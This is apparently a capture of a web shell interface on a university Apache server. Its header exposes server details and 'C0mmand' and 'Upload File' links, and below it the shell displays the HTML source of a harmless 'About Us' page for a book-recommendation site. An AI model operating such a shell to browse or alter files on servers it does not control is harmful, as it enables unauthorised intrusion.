Server IP : 172.16.15.8 / Your IP : 3.16.203.27 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/cjmcgiveron/../kabaines/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html> <head> <title>About Us</title> <style> body { margin: 0; padding: 0; font-size: 15px; background-color: #255055; } .nav { background-color: #255055; margin: 0; overflow: hidden; } .nav ul { margin: 0; padding: 0; display: flex; } .nav li { display: inline-block; list-style-type: none; padding-left: 10px; } .nav a { color: white; display: block; text-decoration: none; padding: 10px; padding-bottom: 0; margin-bottom:0; } .hover:hover { background-color: #B2B7AF; } .hover:hover a{ color: black; } .hover a:hover { color: black; } .nav ul li:first-child { margin-right: auto; } .nav img{ width: 3em; background-color: #255055; } #space { width: 100%; } #space:hover { background-color: #255055; } .rw { display: flex; justify-content: center; } .col { display: inline-block; width: 250px; } .col li{ list-style:none; } .about { background-color: white; margin-left: 18%; margin-right: 18%; padding: 50px; border-radius: 25px; } </style> </head> <body> <div class=nav> <ul> <li><a href=Home.html class=logo><img src="bookRexs.jpg" atr="Bookasaurus Logo; Dinosaur sitting on a small stack of books."></a></li> <li id=space></li> <a href=about.html class=hover><li>About Us</li></a> <a href=login.html class=hover><li>Login</li></a> <a href=create.html class=hover><li>Create Account</li></a> </ul> </div> <div class=about> <H1>About Us</H1> <p>Welcome to Bookasaurus. Here, our mission is to prove there's the perfect book out there for everyone.</p> <h3>Our Algorithm</h3> <p>Our algorithm follows a five step process:</p> <ol> <li>Find all of the books in our database marked as a favorite genre for you.</li> <li>Randomize that list.</li> <li>Iterate over the list and calculate the compatability score for each book.</li> <li>Once we find enough compatible rex, we break out of the list.</li> <li>Display your Rex!</li> </ol> <p>You might have noticed a couple key words in there, like randomize and break. If you're familiar with programming and algorithms, you probably alreeady guessed what that means, but in case not we'll go ahead and explain. Basically, in order to speed things up, we don't calculate every book's compatability. In face, we more or less grade on a curve relevant to the first book, selected at random. This means every time you come back, there will be new rex for you.</p> <H3>Improvements</H3> <p>There's a lot of things we can do to make Bookasaurus better. Like most things, there's always room for improvement. So check in reguarly to see what new changes we have in store!</p> </div> </body> </html>